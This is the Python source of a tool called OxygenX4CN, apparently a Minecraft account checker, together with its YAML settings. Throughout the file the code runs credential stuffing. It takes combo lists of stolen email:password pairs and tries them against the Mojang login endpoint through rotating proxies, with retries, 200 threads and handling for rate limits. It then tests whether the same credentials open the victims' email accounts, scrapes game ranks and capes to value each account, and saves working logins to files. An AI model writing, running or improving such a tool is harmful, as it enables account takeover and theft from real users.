# \/ \/\/ /_____/ \/ \/ \_/
#
# -Created and coded by earthno1
# -Code cleaned and revised by MohanadHosny#9152
# -Settings file for OxygenX4CN-{version}
OxygenX:
# This option is for Chinese. It let every Chinese don' t need VPN to check LiquidBounce.
# Default True Because I Love China
# I love China !!!
china_network_support: true
# Check if current version of OxygenX is latest
check_for_updates: true
# Amount of checks for a account many times to check a account. will be slower if retries is set higher
# Needs to be 1 or higher (Recommanded: 1-2 for paid proxies, 3-6 for public proxies.)
retries: 3
# Higher for better accuracy but slower (counted in milliseconds, example: 6000ms = 6 seconds)
timeout: 6000
# Threads for account checking
threads: 200
# Remove all duplicates in combolist
combo_duplicates: true
# Remove all duplicates in proxylist/api
proxy_duplicates: true
# Check hits if its a mail access
mail_access: true
# Save ranked accounts in NFA.txt or SFA.txt (Turn it off for ranked accounts NOT to save in NFA.txt or SFA.txt)
save_ranked_type: true
# Print bad accounts
print_bad: true
# Save bad accounts
save_bad: true
# Normal users should keep this false unless problem start happening
debugging: false
capes:
# Check capes
liquidbounce: true
optifine: true
labymod: true
mojang: true
rank:
# Set true if you want to check the ranks/level
mineplex: true
hypixel: true
hivemc: true
veltpvp: true
level:
# Save High leveled accounts in files.
hypixel: true
mineplex: true
# Minimum high level accounts
hypixel_level: 25
mineplex_level: 25
proxy:
# If proxies should be used, Will be proxyless if set to false (Recommended to use VPN if this is set to false.)
proxy: true
# Proxy types: https | socks4 | socks5
proxy_type: 'socks4'
# EXPERMENTAL! Still in testing stage, may have problems
# Locks the proxy so other threads can't use it
lock_proxy: false
# EXPERMENTAL! Still in testing stage, may have problems
# Auto remove proxies (you can limit the proxies removed with proxy_remove_limit)
remove_bad_proxy: false
# EXPERMENTAL! Still in testing stage, may have problems
# If remove bad proxies are on, once the proxy list hits the limit it will stop removing bad proxies
proxy_remove_limit: 2000
# If proxies be used for checking sfas (Will be slower but if false, you may get ip banned)
proxy_for_sfa: false
# Sleep between checks if proxy mode is false (put 0 for no sleep) counted in secouds
sleep_proxyless: 30
api:
# If proxy api link to be used.
use: false
# If proxy_use_api is true, put api link in the parentheses
api_link: "https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=3000"
# If proxy_use_api is true, put a number for seconds to refresh the link (every number under 30 is for no refreshing time, recommend refresh time: 300 seconds aka 5 minutes)
refresh_time: 300
'''
if path.exists('Settings.yml'):
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
else:
open('Settings.yml', 'w').write(default_values)
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
class Counter:
nfa = 0
error = 0
sfa = 0
unfa = 0
demo = 0
hits = 0
bad = 0
optifine = 0
mojang = 0
labymod = 0
liquidbounce = 0
special_name = 0
hivemcrank = 0
mineplexrank = 0
mineplexhl = 0
hypixelrank = 0
hypixelhl = 0
hivelevel = 0
mfa = 0
nohypixel = 0
nomineplex = 0
veltrank = 0
checked = 0
cpm = 0
legacy_name = 0
bad_retries = []
class Main:
def __init__(self):
self.stop_time = True
self.announcement = ''
self.start_time = 0
self.accounts = []
self.proxylist = []
self.folder = ''
self.unmigrated = False
if OxygenX.Cape.lb:
self.lbcape = str(self.liquidbounce())
print(t)
print(f'{red}[!] Please remember to configure your settings file before using OxygenX\n')
print(f'{cyan}[Mode] Choose checker mode\n'
'[>] 1 for Normal Mode\n'
'[>] 2 for Unmigrated Mode')
mode = input('> ')
if mode == '2':
self.unmigrated = True
else:
pass
print('\nSelected Normal Mode')
self.loadcombo()
self.loadproxy()
self.resultfolder()
print(f'\n{cyan}Starting Threads...')
Thread(target=self.cpm_counter, daemon=True).start()
self.start_checker()
print(f'[{red}Exit{white}] You can now close OxygenX...\n')
input()
exit()
def prep(self, line):
if ':' in line:
try:
email, password = line.split(':', 1)
original_line = line
original_email = email
if self.unmigrated:
if '@' in email:
email = email.split('@')[0]
if not any(x in email for x in charz):
line = f'{email}:{password}'
else:
Counter.checked += 1
Counter.bad += 1
self.prints(f'{red}[Badline] {blue}- {red}{line}')
self.writing([line, 'Badline'])
return
reply = self.checkname(email)
if not reply:
if OxygenX.retries > 1 and Counter.bad_retries.count(hash(line)) < OxygenX.retries:
Counter.bad_retries.append(hash(line))
self.prints(f'{yellow}[Retry] {blue}- {yellow}{line}')
return self.prep(line)
else:
Counter.checked += 1
Counter.bad += 1
if OxygenX.print_bad:
self.prints(f'{red}[Bad] {blue}- {red}{line}')
if OxygenX.save_bad:
self.writing([line, 'Bad'])
return
else:
Counter.legacy_name += 1
else:
pass
answer = self.checkmc(user=email, passw=password)
Counter.checked += 1
if 'Invalid credentials' in answer:
if OxygenX.retries > 1 and Counter.bad_retries.count(hash(line)) < OxygenX.retries:
Counter.bad_retries.append(hash(line))
self.prints(f'{yellow}[Retry] {blue}- {yellow}{line}')
return self.prep(line)
else:
Counter.bad += 1
if OxygenX.print_bad:
self.prints(f'{red}[Bad] {blue}- {red}{line}')
if OxygenX.save_bad:
self.writing([line, 'Bad'])
return
texta = answer.text
if '[]' in texta:
self.prints(f'{yellow}[Demo] {blue}- {yellow}{line}')
Counter.demo += 1
self.writing([line, 'Demo'])
return
else:
ajson = answer.json()
uuid = ajson['availableProfiles'][0]["id"]
username = ajson['availableProfiles'][0]['name']
self.writing([line, 'Hits'])
token = ajson['accessToken']
dosfa = True
sfa = False
saveranked = True
if self.unmigrated:
data = ['=======================================\n'
f'Original Combo: {original_line}\n'
f'Unmigrated Combo: {line}\n'
f'Username: {username}\n'
f'UUID: {uuid}\n'
f'Email?: {original_email}\n'
f'Password: {password}']
else:
data = ['=======================================\n'
f'Original Combo: {line}\n'
f'Username: {username}\n'
f'UUID: {uuid}\n'
f'Email: {email}\n'
f'Password: {password}']
if "legacy': True" in str(ajson) or (
self.unmigrated and "legacy': True" in str(ajson)):
Counter.unfa += 1
self.prints(f'{magenta}[Unmigrated]{blue} - {green}{line}')
self.writing([line, 'Unmigrated'])
data.append('\nUnmigrated: True')
dosfa = False
if dosfa or not self.unmigrated:
securec = self.secure_check(token=token)
if securec:
Counter.sfa += 1
self.prints(f'{cyan}[SFA]{blue} - {green}{line}{blue} | {green}Username: {username}')
sfa = True
data.append('\nSFA: True')
else:
Counter.nfa += 1
self.prints(f'{green}[NFA]{blue} - {green}{line}{blue} | {green}Username: {username}')
Counter.hits += 1
if len(username) <= 3 or any(x in username for x in charz):
Counter.special_name += 1
self.writing([f'{line} | Username: {username}', 'SpecialName'])
data.append('\nSpecial Name: True')
with ThreadPoolExecutor(max_workers=9) as exe:
hypixel = exe.submit(self.hypixel, uuid, line).result()
mineplex = exe.submit(self.mineplex, username, line).result()
hiverank = exe.submit(self.hivemc, uuid, line).result()
mailaccess = exe.submit(self.mailaccess, original_line).result()
veltrank = exe.submit(self.veltpvp, username, line).result()
mojang = exe.submit(self.mojang, uuid, line, username).result()
optifine = exe.submit(self.optifine, username, line).result()
labycape = exe.submit(self.labymod, uuid, line, username).result()
skyblock = exe.submit(self.skyblock, uuid).result()
try:
if mojang:
data.append('\nMojang Cape: True')
if optifine:
data.append('\nOptifine Cape: True')
if labycape:
data.append('\nLabymod Cape: True')
if OxygenX.Cape.lb:
if uuid in self.lbcape:
Counter.liquidbounce += 1
self.writing([f'{line} | Username: {username}', 'LiquidBounceCape'])
data.append('\nLiquidBounce Cape: True')
if dosfa:
if mailaccess:
data.append('\nMFA: True')
if veltrank:
if not OxygenX.ranktype:
saveranked = False
data.append(f'\nVelt Rank: {veltrank}')
if hiverank:
data.append(f'\nHive Rank: {str(hiverank)}')
if not OxygenX.ranktype:
saveranked = False
if OxygenX.Rank.mineplex or OxygenX.Level.mineplex:
if mineplex[0]:
data.append(f'\nMineplex Rank: {mineplex[0]}')
if not OxygenX.ranktype:
saveranked = False
if mineplex[1]:
data.append(f'\nMineplex Level: {str(mineplex[1])}')
if not mineplex[0] and not mineplex[1]:
data.append(f'\nNo Mineplex Login: True')
if OxygenX.Rank.hypixel or OxygenX.Level.hypixel:
if not hypixel[2]:
if str(hypixel[0]) not in ['None', 'False']:
if not OxygenX.ranktype:
saveranked = False
data.append(f'\nHypixel Rank: {hypixel[0]}')
if hypixel[1]:
data.append(f'\nHypixel Level: {str(hypixel[1])}')
if hypixel[3]:
data.append(f'\nHypixel LastLogout Date: {hypixel[3]}')
if hypixel[4] != 0:
data.append(f'\nHypixel SkyWars Coins: {str(hypixel[4])}')
if hypixel[5] != 0:
data.append(f'\nHypixel BedWars Level: {str(hypixel[5])}')
if hypixel[6] != 0:
data.append(f'\nHypixel BedWars Coins: {str(hypixel[6])}')
if skyblock:
data.append(f'\nHypixel SkyBlock Stats: https://sky.lea.moe/stats/{uuid}')
else:
data.append(f'\nNo Hypixel Login: True')
except:
if OxygenX.debug:
self.prints(f'{red}[Error] {line} \nRank/Cape Check Error: {format_exc(limit=1)}')
if saveranked and dosfa:
if sfa:
self.writing([line, 'SFA'])
else:
self.writing([line, 'NFA'])
self.writing([''.join(data), 'CaptureData'])
return
except:
if OxygenX.debug:
self.prints(f'{red}[Error] {line} \nError: {format_exc(limit=1)}')
self.writing([line, 'Error'])
Counter.error += 1
return
else:
Counter.checked += 1
Counter.bad += 1
self.prints(f'{red}[Badline] {line}')
self.writing([line, 'Badlines'])
return
def checkmc(self, user, passw, ):
payload = ({
'agent': {
'name': 'Minecraft',
'version': 1
},
'username': user,
'password': passw,
'requestUser': 'true'
})
bad = 'Invalid credentials'
retries = 0
if not OxygenX.Proxy.proxy:
while True:
if retries != OxygenX.retries:
try:
answer = session.post(url=auth_mc, json=payload, headers=jsonheaders,
timeout=OxygenX.timeout)
if bad in answer.text:
retries += 1
sleep(OxygenX.Proxy.sleep)
continue
elif 'Client sent too many requests too fast.' in answer.text:
sleep(5)
continue
else:
return answer
except:
if OxygenX.debug:
self.prints(f'CheckMC ProxyLess: \n{format_exc(limit=1)}')
continue
else:
return bad
else:
while True:
if retries != OxygenX.retries:
proxy_form = {}
proxy = choice(self.proxylist)
if proxy.count(':') == 3:
spl = proxy.split(':')
proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
else:
proxy = proxy
locked = OxygenX.Proxy.lock_proxy
if proxy in ['', '\n']:
try:
self.proxylist.remove(proxy)
continue
except:
pass
if locked:
try:
self.proxylist.remove(proxy)
except:
locked = False
if OxygenX.Proxy.type in ['https', 'http']:
proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
elif OxygenX.Proxy.type in ['socks4', 'socks5']:
line = f"{OxygenX.Proxy.type}://{proxy}"
proxy_form = {'http': line, 'https': line}
try:
answer = scraper.post(url=auth_mc, proxies=proxy_form, json=payload, headers=jsonheaders,
timeout=OxygenX.timeout)
if locked:
self.proxylist.append(proxy)
if bad in answer.text:
retries += 1
continue
elif answer.headers.get("Content-Type").__contains__("html"):
if OxygenX.Proxy.remove_bad_proxy and len(
self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
if not locked:
try:
self.proxylist.remove(proxy)
except:
pass
continue
else:
return answer
except exceptions.RequestException:
if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
if not locked:
try:
self.proxylist.remove(proxy)
except:
pass
elif locked:
self.proxylist.append(proxy)
except:
if locked:
self.proxylist.append(proxy)
if OxygenX.debug:
self.prints(f'CheckMC: \n{format_exc(limit=1)}')
continue
else:
return bad
def secure_check(self, token):
headers = {'Pragma': 'no-cache', "Authorization": f"Bearer {token}"}
try:
if not OxygenX.Proxy.proxy or not OxygenX.Proxy.sfa_proxy:
try:
z = session.get(url=sfa_url, headers=headers).text
if z == '[]':
return True
else:
return False
except:
if OxygenX.debug:
self.prints(f'ErrorSFA ProxyLess: \n{format_exc(limit=1)}')
return False
else:
while True:
proxy_form = {}
proxy = choice(self.proxylist)
if proxy.count(':') == 3:
spl = proxy.split(':')
proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
else:
proxy = proxy
if proxy in ['', '\n']:
try:
self.proxylist.remove(proxy)
continue
except:
pass
if OxygenX.Proxy.type == 'http' or OxygenX.Proxy.type == 'https':
proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
elif OxygenX.Proxy.type == 'socks4' or OxygenX.Proxy.type == 'socks5':
line = f"{OxygenX.Proxy.type}://{proxy}"
proxy_form = {'http': line, 'https': line}
try:
resp = session.get(url=sfa_url, headers=headers, proxies=proxy_form).text
if 'request blocked' in resp.lower():
continue
elif resp == '[]':
return True
else:
return False
except exceptions.RequestException:
if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
try:
self.proxylist.remove(proxy)
except:
pass
continue
except:
if OxygenX.debug:
self.prints(f'Error SFA: \n{format_exc(limit=1)}')
return False
def checkname(self, username):
try:
if OxygenX.Proxy.proxy:
while True:
proxy_form = {}
proxy = choice(self.proxylist)
if proxy.count(':') == 3:
spl = proxy.split(':')
proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
else:
proxy = proxy
if OxygenX.Proxy.type == 'http' or OxygenX.Proxy.type == 'https':
proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
elif OxygenX.Proxy.type == 'socks4' or OxygenX.Proxy.type == 'socks5':
line = f"{OxygenX.Proxy.type}://{proxy}"
proxy_form = {'http': line, 'https': line}
try:
answer = scraper.post(url=user_url, json=[username], proxies=proxy_form, headers=mailheaders,
timeout=OxygenX.timeout).text
if 'The request could not be satisfied' in answer:
continue
elif 'legacy":true' in answer:
return True
else:
return False
except exceptions.RequestException:
if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
try:
self.proxylist.remove(proxy)
except:
pass
continue
else:
try:
sleep(OxygenX.Proxy.sleep)
answer = scraper.post(url=user_url, json=[username], headers=mailheaders,
timeout=OxygenX.timeout).text
if 'legacy":true' in answer:
return True
else:
return False
except:
if OxygenX.debug:
self.prints(f'{red}[Error Check] {format_exc(limit=1)}')
return False
except:
if OxygenX.debug:
self.prints(f'{red}[Error Check] {format_exc(limit=1)}')
return False
def title(self):
while self.stop_time:
if not self.unmigrated:
set_title(
f"OxygenX-{version}"
f" | Hits: {Counter.hits}"
f" - Bad: {Counter.bad}"
f'{"" if Counter.nfa == 0 else f" - NFA: {Counter.nfa}"}'
f'{"" if Counter.sfa == 0 else f" - SFA: {Counter.sfa}"}'
f'{"" if Counter.unfa == 0 else f" - Unmigrated: {Counter.unfa}"}'
f'{"" if Counter.demo == 0 else f" - Demo: {Counter.demo}"}'
f"{'' if Counter.mfa == 0 else f' - MFA: {Counter.mfa}'}"
f"{'' if len(Counter.bad_retries) == 0 else f' | Retries: {len(Counter.bad_retries)}'}"
f"{'' if Counter.error == 0 else f' | Errors: {Counter.error}'}"
f" | Left: {len(self.accounts) - Counter.checked}/{len(self.accounts)}"
f'{"" if not OxygenX.Proxy.proxy else f" - Proxies: {len(self.proxylist)}"}'
f' | CPM: {Counter.cpm}'
f' | {self.now_time()} Elapsed')
else:
set_title(
f"OxygenX-{version} | "
f"Hits: {Counter.hits}"
f" - Bad: {Counter.bad}"
f'{"" if Counter.legacy_name == 0 else f" - Legacy Lines: {Counter.legacy_name}"}'
f'{"" if Counter.unfa == 0 else f" - Unmigrated: {Counter.unfa}"}'
f"{'' if len(Counter.bad_retries) == 0 else f' | Retries: {len(Counter.bad_retries)}'}"
f"{'' if Counter.error == 0 else f' | Errors: {Counter.error}'}"
f" | Left: {len(self.accounts) - Counter.checked}/{len(self.accounts)}"
f'{"" if not OxygenX.Proxy.proxy else f" - Proxies: {len(self.proxylist)}"}'
f' | CPM: {Counter.cpm}'
f' | {self.now_time()} Elapsed | Unmigrated Checker')
def prints(self, line):
lock.acquire()
print(f'{blue}{self.now_time()} {line}')
lock.release()
def writing(self, line):
lock.acquire()
open(f'{self.folder}/{line[1]}.txt', 'a', encoding='u8').write(f'{line[0]}\n')
lock.release()
def optifine(self, user, combo):
cape = False
if OxygenX.Cape.optifine:
try:
optifine = session.get(url=f'http://s.optifine.net/capes/{user}.png').text
if 'Not found' not in optifine:
cape = True
Counter.optifine += 1
self.writing([f'{combo} | Username: {user}', 'OptifineCape'])
return cape
except:
if OxygenX.debug:
self.prints(f'{red}Error Optifine:\n{format_exc(limit=1)}')
return cape
def mojang(self, uuid, combo, user):
cape = False
if OxygenX.Cape.mojang:
try:
mine = session.get(url=f'https://crafatar.com/capes/{uuid}', headers=mailheaders).text.lower()
if 'png' in mine:
cape = True
Counter.mojang += 1
self.writing([f'{combo} | Username: {user}', 'MojangCape'])
return cape
except:
if OxygenX.debug:
self.prints(f'{red}Error MojangCape:\n{format_exc(limit=1)}')
return cape
def labymod(self, uuid, combo, user):
cape = False
if OxygenX.Cape.laby:
link = f'https://capes.labymod.net/capes/{uuid[:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:20]}-{uuid[20:]}'
try:
laby = session.get(url=link, headers=mailheaders).text
if 'Not Found' not in laby:
cape = True
Counter.labymod += 1
self.writing([f'{combo} | Username: {user}', 'LabymodCape'])
except:
if OxygenX.debug:
self.prints(f'{red}Error Labymod:\n{format_exc(limit=1)}')
return cape
def liquidbounce(self):
try:
if OxygenX.china_network_support:
lbc = session.get(
url='https://199.232.68.133/CCBlueX/FileCloud/master/LiquidBounce/cape/service.json',
headers=dict(mailheaders, **{"Host": "raw.githubusercontent.com"}), verify=False).text
else:
lbc = session.get(
url='https://raw.githubusercontent.com/CCBlueX/FileCloud/master/LiquidBounce/cape/service.json',
headers=mailheaders).text
return lbc
except:
if OxygenX.debug:
self.prints(f'{red}Error LiquidBounce:\n{format_exc(limit=1)}')
return False
def hivemc(self, uuid, combo):
rank = False
if OxygenX.Rank.hivemc:
try:
response = session.get(url=f'https://www.hivemc.com/player/{uuid}', headers=mailheaders).text
match = rankhv.search(response).group(1)
if match != 'Regular':
rank = match
except AttributeError:
rank = False
except:
if OxygenX.debug:
self.prints(f'{red}Error HiveMC:\n{format_exc(limit=1)}')
if rank:
self.writing([f'{combo} | Rank: {str(rank)}', 'HiveRanked'])
Counter.hivemcrank += 1
return rank
def mineplex(self, username, combo):
both = [False, False]
if OxygenX.Rank.mineplex or OxygenX.Level.mineplex:
try:
response = session.get(url=f'https://www.mineplex.com/players/{username}',
headers=mailheaders).text
if 'That player cannot be found.' in response:
both[0] = False
both[1] = False
else:
both[0] = str(rankmp.search(response).group(1))
both[1] = int(levelmp.search(response).group(1))
if both[0].lower() == '':
both[0] = False
except:
if OxygenX.debug:
self.prints(f'{red}Error Mineplex:\n{format_exc(limit=1)}')
if both[0]:
Counter.mineplexrank += 1
self.writing([f'{combo} | Rank: {both[0]}', 'MineplexRanked'])
if both[1] and OxygenX.Rank.mineplex:
if both[1] >= OxygenX.Level.mineplex_level:
Counter.mineplexhl += 1
self.writing([f'{combo} | Level: {str(both[1])}', 'MineplexHighLevel'])
if not both[0] and not both[1]:
Counter.nomineplex += 1
self.writing([combo, 'NoMineplexLogin'])
return both
def hypixel(self, uuid, combo):
both = [False, False, False, False, 0, 0, 0]
if OxygenX.Rank.hypixel or OxygenX.Level.hypixel:
try:
answer = session.get(url=f'https://api.slothpixel.me/api/players/{uuid}',
headers=mailheaders).json()
if 'Failed to get player uuid' not in str(answer):
rank = str(answer['rank'])
if '_PLUS' in rank:
rank = rank.replace('_PLUS', '+')
level = int(answer["level"])
nolog = str(answer['username'])
bedwars_level = int(answer['stats']['BedWars']['level'])
bedwars_coins = int(answer['stats']['BedWars']['coins'])
skywars_coins = int(answer['stats']['SkyWars']['coins'])
if nolog == 'None':
both[2] = True
else:
both[0] = str(rank)
both[1] = int(round(level))
both[3] = str(datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(
milliseconds=int(answer['last_login']))).split(' ')[0]
both[4] = skywars_coins
both[5] = bedwars_level
both[6] = bedwars_coins
else:
both[2] = True
except:
if OxygenX.debug:
self.prints(f'{red}Slothpixel API Error: \n{format_exc(limit=1)}')
if not both[2]:
if str(both[0]) not in ['None', 'False']:
Counter.hypixelrank += 1
self.writing([f'{combo} | Rank: {both[0]}', 'HypixelRanked'])
if both[1] >= OxygenX.Level.hypixel_level:
Counter.hypixelhl += 1
self.writing([f'{combo} | Level: {str(both[1])}', 'HypixelHighLevel'])
else:
Counter.nohypixel += 1
self.writing([combo, 'NoHypixelLogin'])
return both
def skyblock(self, uuid):
try:
link = f'https://sky.lea.moe/stats/{uuid}'
check = session.get(url=link).text
if 'Show SkyBlock stats for' in check:
return False
else:
return link
except:
if OxygenX.debug:
self.prints(f'{red}Error SkyBlock \n{format_exc(limit=1)}')
return False
def veltpvp(self, username, combo):
rank = False
if OxygenX.Rank.veltpvp:
try:
link = session.get(url=f'https://www.veltpvp.com/u/{username}', headers=mailheaders).text
if 'Not Found' not in link:
rank = veltrankz.search(link).group(1)
if rank not in ['Default', 'Standard']:
rank = rank
else:
rank = False
except AttributeError:
rank = False
except:
if OxygenX.debug:
self.prints(f'{red}Error Veltpvp:\n{format_exc(limit=1)}')
if rank:
self.writing([f'{combo} | Rank: {rank}', 'VeltRanked'])
Counter.veltrank += 1
return rank
def mailaccess(self, combo):
email, password = combo.split(':', 1)
mailaccess = False
if OxygenX.emailaccess:
try:
ans = session.get(
url=f'https://aj-https.my.com/cgi-bin/auth?ajax_call=1&mmp=mail&simple=1&Login={email}&Password={password}',
headers=mailheaders).text
except:
if OxygenX.debug:
self.prints(f'{red}Error Mail Access: \n{format_exc(limit=1)}')
ans = 'BAD'
if ans == 'Ok=1':
mailaccess = True
Counter.mfa += 1
self.writing([combo, 'EmailAccess'])
return mailaccess
def rproxies(self):
while self.stop_time:
try:
sleep(OxygenX.Proxy.API.refresh)
loader = session.get(OxygenX.Proxy.API.api).text.splitlines()
if OxygenX.proxy_dup:
self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
else:
self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
except:
if OxygenX.debug:
print(f"{red}Error while refreshing proxies: \n{format_exc(limit=1)}\n")
sleep(60)
break
def now_time(self):
return strftime("%H:%M:%S", gmtime(time() - self.start_time))
def loadcombo(self):
while True:
try:
print(f"{cyan}Please Import Your Combo List...")
sleep(0.3)
loader = open(fileopenbox(title="Load Combo List", default="*.txt"), 'r', encoding="utf8",
errors='ignore').read().split('\n')
if OxygenX.combo_dup:
self.accounts = list(set(x.strip() for x in loader if x != ''))
else:
self.accounts = [x.strip() for x in loader if x != '']
if len(self.accounts) == 0:
print(f'{red}No combo found!, Please make sure file have combos...\n')
continue
print(f"{magenta} > Imported {len(self.accounts)} lines")
break
except:
if OxygenX.debug:
print(f"{red}Error while loading combo: \n{format_exc(limit=1)}\n")
# Load Proxy #
def loadproxy(self):
while True:
try:
if OxygenX.Proxy.proxy:
idk = True
loader = []
if not OxygenX.Proxy.API.use:
print(f"\n{cyan}Please Import Your Proxies List.....")
sleep(0.3)
loader = open(fileopenbox(title="Load Proxies List", default="*.txt"), 'r', encoding="utf8",
errors='ignore').read().split('\n')
elif OxygenX.Proxy.API.use:
try:
idk = False
loader = session.get(OxygenX.Proxy.API.api).text.split("\n")
if OxygenX.Proxy.API.refresh >= 30:
Thread(target=self.rproxies, daemon=True).start()
sleep(2)
except:
if OxygenX.debug:
print(
f"{red}Error while loading proxies from api: \n{format_exc(limit=1)}\n")
sleep(60)
break
if OxygenX.proxy_dup:
self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
else:
self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
length_file = len(self.proxylist)
if length_file == 0:
print(f'{red}No proxies found! Please make sure file have proxies...')
continue
elif length_file == 0 and OxygenX.Proxy.API:
print(f'{red}No proxies found in API, OxygenX will exit in 3 seconds...')
sleep(3)
exit()
print(f"{magenta} > Imported {length_file} proxies from {'File' if idk else 'API'}")
break
else:
break
except:
if OxygenX.debug:
print(f"{red}Error while loading proxies: \n{format_exc(limit=1)}\n")
sleep(60)
break
def resultfolder(self):
unix = str(strftime('[%d-%m-%Y %H-%M-%S]'))
self.folder = f'results/{unix}'
if not path.exists('results'):
mkdir('results')
if not path.exists(self.folder):
mkdir(self.folder)
def get_announcement(self):
try:
if OxygenX.china_network_support:
announcement = session.get(
'https://199.232.68.133/earthno1/OxygenX4CN/master/announcement',
headers={"Host": "raw.githubusercontent.com"}, verify=False).text.split("Color: ")
else:
announcement = session.get(
'https://raw.githubusercontent.com/earthno1/OxygenX4CN/master/announcement').text.split("Color: ")
color = announcement[1].lower()
if color == 'red\n':
color = red
elif color == 'white\n':
color = white
elif color == 'blue\n':
color = blue
elif color == 'green\n':
color = green
elif color == 'cyan\n':
color = cyan
elif color == 'magenta\n':
color = magenta
elif color == 'yellow\n':
color = yellow
self.announcement = f"{color}{announcement[0]}"
except:
if OxygenX.debug:
print(f"{red}Error while displaying announcement: \n{format_exc(limit=1)}\n")
return
def start_checker(self):
if OxygenX.threads > len(self.accounts):
OxygenX.threads = int(len(self.accounts))
self.get_announcement()
mainpool = ThreadPool(processes=OxygenX.threads)
Thread(target=self.title).start()
mainpool.imap_unordered(func=self.prep, iterable=self.accounts)
clear()
print(t)
print(self.announcement)
self.start_time = time()
mainpool.close()
mainpool.join()
symbo = f'[{Fore.GREEN}>{white}]'
cyanz = f'[{Fore.CYAN}>{white}]'
result = f'{white}\n\n[{Fore.YELLOW}>{white}] Results: \n\n' \
f'[{green}+{white}] Hits: {Counter.hits}\n' \
f'[{red}-{white}] Bad: {Counter.bad}{white}\n\n' \
f'[{yellow}>{white}] Demo: {Counter.demo}\n' \
f'[{green}>{white}] NFA: {Counter.nfa}\n' \
f'{cyanz} SFA: {Counter.sfa}\n' \
f'[{blue}>{white}] MFA: {Counter.mfa}\n' \
f'[{magenta}>{white}] Unmigrated: {Counter.unfa}\n\n' \
f'{symbo} NoHypixel Login accounts: {Counter.nohypixel}\n' \
f'{symbo} NoMineplex Login accounts: {Counter.nomineplex}\n' \
f'{symbo} Mojang capes: {Counter.mojang}\n' \
f'{symbo} Optifine capes: {Counter.optifine}\n' \
f'{symbo} Labymod capes: {Counter.labymod}\n' \
f'{symbo} LiquidBounce capes: {Counter.liquidbounce}\n' \
f'{symbo} Hypixel Ranked accounts: {Counter.hypixelrank}\n' \
f'{symbo} Mineplex Ranked accounts: {Counter.mineplexrank}\n' \
f'{symbo} HiveMC Ranked accounts: {Counter.hivemcrank}\n' \
f'{symbo} Veltpvp Ranked accounts: {Counter.veltrank}\n' \
f'{symbo} Hypixel {OxygenX.Level.hypixel_level}+ accounts: {Counter.hypixelhl}\n' \
f'{symbo} Mineplex {OxygenX.Level.mineplex_level}+ accounts: {Counter.mineplexhl}\n\n' \
f'{cyanz} Speed: {cyan}{round(Counter.checked / (time() - self.start_time), 2)} accounts/s\n' \
f'{white}{cyanz} Total time checking: {cyan}{self.now_time()}\n\n' \
f'[{magenta}x{white}] Finish checking..\n'
self.stop_time = False
print(result)
def cpm_counter(self):
while self.stop_time:
if Counter.checked >= 1:
now = Counter.checked
sleep(3)
Counter.cpm = (Counter.checked - now) * 20
def checkforupdates():
try:
if OxygenX.china_network_support:
gitversion = session.get(
"https://199.232.68.133/earthno1/OxygenX4CN/master/version.txt",
headers={"Host": "raw.githubusercontent.com"}, verify=False).text
else:
gitversion = session.get(
"https://raw.githubusercontent.com/earthno1/OxygenX4CN/master/version.txt").text
if f'{version}\n' != gitversion:
print(t)
print(f"{red}Your version is outdated.")
print(f"Your version: {version}\n")
print(f'Latest version: {gitversion}Get latest version in the link below')
print(f"https://github.com/earthno1/OxygenX4CN\nStarting in 5 seconds...{cyan}")
sleep(5)
clear()
except:
if OxygenX.debug:
print(f"{red} Error while checking for updates: \n{format_exc(limit=1)}\n")
class OxygenX:
china_network_support = bool(settings['OxygenX']['china_network_support'])
version_check = bool(settings['OxygenX']['check_for_updates'])
retries = int(settings['OxygenX']['retries'])
timeout = int(settings['OxygenX']['timeout']) / 1000
threads = int(settings['OxygenX']['threads'])
combo_dup = bool(settings['OxygenX']['combo_duplicates'])
proxy_dup = bool(settings['OxygenX']['proxy_duplicates'])
emailaccess = bool(settings['OxygenX']['mail_access'])
ranktype = bool(settings['OxygenX']['save_ranked_type'])
print_bad = bool(settings['OxygenX']['print_bad'])
save_bad = bool(settings['OxygenX']['save_bad'])
debug = bool(settings['OxygenX']['debugging'])
class Cape:
lb = bool(settings['OxygenX']['capes']['liquidbounce'])
optifine = bool(settings['OxygenX']['capes']['optifine'])
laby = bool(settings['OxygenX']['capes']['labymod'])
mojang = bool(settings['OxygenX']['capes']['mojang'])
class Rank:
mineplex = bool(settings['OxygenX']['rank']['mineplex'])
hypixel = bool(settings['OxygenX']['rank']['hypixel'])
hivemc = bool(settings['OxygenX']['rank']['hivemc'])
veltpvp = bool(settings['OxygenX']['rank']['veltpvp'])
class Level:
hypixel = bool(settings['OxygenX']['level']['hypixel'])
mineplex = bool(settings['OxygenX']['level']['mineplex'])
hypixel_level = int(settings['OxygenX']['level']['hypixel_level'])
mineplex_level = int(settings['OxygenX']['level']['mineplex_level'])
class Proxy:
proxy = bool(settings['OxygenX']['proxy']['proxy'])
type = str(settings['OxygenX']['proxy']['proxy_type']).lower()
lock_proxy = bool(settings['OxygenX']['proxy']['lock_proxy'])
remove_bad_proxy = bool(settings['OxygenX']['proxy']['remove_bad_proxy'])
proxy_remove_limit = int(settings['OxygenX']['proxy']['proxy_remove_limit']) + 1
sfa_proxy = bool(settings['OxygenX']['proxy']['proxy_for_sfa'])
sleep = int(settings['OxygenX']['proxy']['sleep_proxyless'])
class API:
use = bool(settings['OxygenX']['proxy']['api']['use'])
api = str(settings['OxygenX']['proxy']['api']['api_link'])
